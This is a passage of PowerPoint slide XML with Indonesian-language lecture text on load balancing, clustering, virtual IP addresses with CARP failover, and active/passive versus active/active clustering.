            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cluster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data, server file, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>IP Virtual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua instance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cluster. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Instans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>". </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Common Address Redundancy Protocol (CARP), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simpul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" IP virtual dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengelompokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (A/P) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (A/A)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelompokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbesar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpengaruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>negatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> failover. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
